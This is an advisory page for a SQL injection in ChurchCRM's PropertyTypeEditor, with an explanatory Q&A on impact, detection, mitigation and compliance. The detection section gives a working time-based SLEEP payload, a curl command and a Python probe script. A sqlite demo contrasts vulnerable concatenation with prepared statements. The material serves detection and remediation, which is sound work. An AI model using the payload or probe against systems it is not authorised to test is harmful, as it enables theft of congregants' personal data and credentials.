CVE-2026-39340
SQL Injection in ChurchCRM PropertyTypeEditor Allows Data Exfiltration
Publication date: 2026-04-07
Last updated on: 2026-04-09
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| churchcrm | churchcrm | all versions before 7.1.0 (7.1.0 itself not affected) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-39340 is a SQL injection vulnerability in ChurchCRM's PropertyTypeEditor.php file, affecting versions prior to 7.1.0.
The issue arose when the legacyFilterInput() function, which both stripped HTML and escaped SQL inputs, was replaced by sanitizeText(), which only strips HTML tags without escaping SQL.
Because user-supplied values from the Name and Description fields are concatenated directly into raw SQL INSERT and UPDATE queries without any SQL escaping, an attacker can inject malicious SQL code.
Any authenticated user with the MenuOptions role (a non-admin staff permission) can exploit this vulnerability to perform time-based blind SQL injection and exfiltrate data from the database.
How can this vulnerability impact me?
With an account that holds the MenuOptions role, an attacker can use the injection to read and alter the ChurchCRM database. In particular, they can:
- Extract all user accounts and password hashes; bcrypt slows offline cracking but does not prevent it for weak or reused passwords.
- Read personal data such as names, addresses, family relationships, and donation history.
- Modify or delete arbitrary database rows.
- Enumerate the database schema.
- Escalate privileges by cracking recovered hashes and logging in with those credentials.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the 'Name' and 'Description' fields of PropertyTypeEditor.php for SQL injection. A payload such as ' OR SLEEP(5)=0 AND ' in the Name field makes the database evaluate SLEEP(5) inside the INSERT or UPDATE statement, so the response arrives roughly 5 seconds later than normal, which is the signature of a time-based blind SQL injection.
A practical check is an authenticated request from a user holding the MenuOptions role: send a harmless Name first to establish a baseline response time, then the SLEEP payload, and compare the two.
Example curl command (replace the URL and session cookie; the field names follow the page's description of the form, and the real form may require additional hidden fields):
- curl -s -o /dev/null -w '%{time_total}\n' -b "PHPSESSID=your_session_id" --data-urlencode "Name=' OR SLEEP(5)=0 AND '" --data-urlencode "Description=test" https://yourchurchcrm.example.com/PropertyTypeEditor.php
If the printed time is about 5 seconds longer than the baseline across a few repetitions, the instance is vulnerable. Note that a successful probe writes to the property type table, so run it against a test copy rather than production, and check the ChurchCRM version first: anything below 7.1.0 should be treated as affected without probing.
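The same check as a repeatable script, added here as an example and not taken from the page or from the ChurchCRM project. It sends several baseline requests and several SLEEP probes, then compares medians so that one slow network round trip does not produce a false positive. The endpoint path, the PHPSESSID cookie and the Name/Description field names are assumptions carried over from the curl line above; the real form may need additional hidden fields.

```python
"""Time-based blind SQL injection probe for the Name field (added example).
Endpoint, cookie name and form field names are assumptions from the page."""
import statistics
import time
import urllib.parse
import urllib.request

DELAY = 5  # seconds requested from MySQL's SLEEP()
BASELINE_NAME = "probe-baseline"
PROBE_NAME = f"' OR SLEEP({DELAY})=0 AND '"  # the page's payload


def build_fields(name: str, description: str = "test") -> bytes:
    """URL-encode the two form fields the page names (assumption: no other
    fields are required by the real form)."""
    return urllib.parse.urlencode({"Name": name, "Description": description}).encode()


def timed_post(url: str, session_id: str, body: bytes) -> float:
    """Send one authenticated POST and return the elapsed time in seconds."""
    req = urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={
            "Cookie": f"PHPSESSID={session_id}",
            "Content-Type": "application/x-www-form-urlencoded",
        },
    )
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=DELAY * 4) as resp:
        resp.read()
    return time.monotonic() - start


def is_delayed(baseline: list, probes: list, delay: float = DELAY, fraction: float = 0.8) -> bool:
    """Vulnerable if the median probe time exceeds the median baseline by most
    of the requested delay. Medians absorb a single slow or fast outlier."""
    return statistics.median(probes) - statistics.median(baseline) >= delay * fraction


def probe(url: str, session_id: str, samples: int = 3, send=timed_post):
    """Collect baseline and probe timings; `send` is injectable for testing.
    Returns (verdict, baseline_times, probe_times)."""
    baseline = [send(url, session_id, build_fields(BASELINE_NAME)) for _ in range(samples)]
    probes = [send(url, session_id, build_fields(PROBE_NAME)) for _ in range(samples)]
    return is_delayed(baseline, probes), baseline, probes


if __name__ == "__main__":
    import sys
    verdict, base, prb = probe(sys.argv[1], sys.argv[2])
    print("baseline:", base)
    print("probe:   ", prb)
    print("VULNERABLE" if verdict else "no delay observed")
```

Run it as `python3 probe.py https://yourchurchcrm.example.com/PropertyTypeEditor.php your_session_id` against a test copy of the instance, since each request that reaches the INSERT writes a property type row. The 0.8 fraction leaves headroom for the server finishing slightly early; raise DELAY on a slow or jittery link rather than lowering the fraction.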
What immediate steps should I take to mitigate this vulnerability?
The immediate step is to upgrade ChurchCRM to version 7.1.0 or later, where this SQL injection is fixed.
If upgrading is not immediately possible, remove the MenuOptions role from every user who does not strictly need it, since that role is the only prerequisite for exploitation beyond having an account.
Avoid using PropertyTypeEditor.php until the patch is applied. If the MySQL slow query log is enabled, INSERT or UPDATE statements against the property type table that took several seconds and contain SLEEP() are evidence that someone has already probed the instance.
The durable fix is to pass user-supplied values to the database as bound parameters of a prepared statement, which keeps them data no matter what they contain. Restoring legacyFilterInput(), which both stripped HTML and escaped SQL, would also close this particular hole, but escaping-based defenses depend on every call site remembering to escape and on the escape routine matching the connection's character set, so treat that as a stopgap rather than the long-term answer.
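The following example, added here and not ChurchCRM's own code, illustrates both the root cause explained earlier (sanitizeText() strips tags but leaves SQL syntax intact, and the result is concatenated into the INSERT) and the prepared-statement fix recommended above. sqlite3 stands in for MySQL (an assumption), and SLEEP() is registered as a fake function that only counts how often the injected expression is evaluated instead of sleeping; the table schema is constructed for the example.

```python
"""Vulnerable concatenation versus bound parameters (added example, not
ChurchCRM's code). sqlite3 stands in for MySQL; SLEEP() is a counting stub."""
import re
import sqlite3

# The page's probe payload. Inside VALUES ('...') it turns into
#   '' OR SLEEP(5)=0 AND ''
# so the database evaluates SLEEP() instead of storing the text.
PAYLOAD = "' OR SLEEP(5)=0 AND '"


def sanitize_text(value: str) -> str:
    """Stand-in for a sanitizeText()-style filter as the page describes it:
    strips <tags> and nothing else, so quotes and SQL keywords survive (assumption)."""
    return re.sub(r"<[^>]*>", "", value)


class PropertyTypeStore:
    """Tiny stand-in for the property type table (constructed schema)."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.sleep_calls = 0
        # MySQL's SLEEP(n) returns 0 after n seconds; the stub returns 0 at
        # once and records that the injected expression was actually evaluated.
        self.conn.create_function("SLEEP", 1, self._fake_sleep)
        self.conn.execute(
            "CREATE TABLE property_type ("
            "id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
        )

    def _fake_sleep(self, seconds):
        self.sleep_calls += 1
        return 0

    def last_name(self):
        row = self.conn.execute(
            "SELECT name FROM property_type ORDER BY id DESC LIMIT 1"
        ).fetchone()
        return row[0]

    def insert_vulnerable(self, name: str, description: str):
        """The pattern the advisory describes: tags stripped, then the values
        are concatenated straight into the SQL text."""
        name, description = sanitize_text(name), sanitize_text(description)
        sql = (
            "INSERT INTO property_type (name, description) VALUES ('"
            + name + "', '" + description + "')"
        )
        self.conn.execute(sql)
        return self.last_name()

    def insert_safe(self, name: str, description: str):
        """Hardened form: same sanitizer, but the values travel as bound
        parameters, so the quote and SLEEP() are stored as plain text."""
        self.conn.execute(
            "INSERT INTO property_type (name, description) VALUES (?, ?)",
            (sanitize_text(name), sanitize_text(description)),
        )
        return self.last_name()


def demo():
    """Run both code paths with the same payload. Returns what each stored
    and how many times SLEEP() was evaluated on each path."""
    vuln = PropertyTypeStore()
    stored_vuln = vuln.insert_vulnerable(PAYLOAD, "<b>test</b>")
    safe = PropertyTypeStore()
    stored_safe = safe.insert_safe(PAYLOAD, "<b>test</b>")
    return {
        "vulnerable_stored": stored_vuln,
        "vulnerable_sleep_calls": vuln.sleep_calls,
        "safe_stored": stored_safe,
        "safe_sleep_calls": safe.sleep_calls,
    }


if __name__ == "__main__":
    print(demo())
```

On the vulnerable path the stored name is the value of the injected boolean expression rather than the submitted text, and the SLEEP() stub records one call; on the bound-parameter path the payload is stored verbatim and SLEEP() is never reached. The HTML stripping is identical on both paths, which is exactly why swapping an escaping filter for a tag-stripping one reopened the injection.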
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The SQL injection vulnerability in ChurchCRM allows any authenticated user with the MenuOptions role to exfiltrate sensitive data from the database, including password hashes and personal information such as names, addresses, family relationships, and donation history.
This exposure of sensitive personal data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information against unauthorized access and breaches.
The vulnerability enables attackers to read, modify, or delete arbitrary database rows and escalate privileges, increasing the risk of data breaches and unauthorized data disclosure, which are critical compliance concerns under these standards.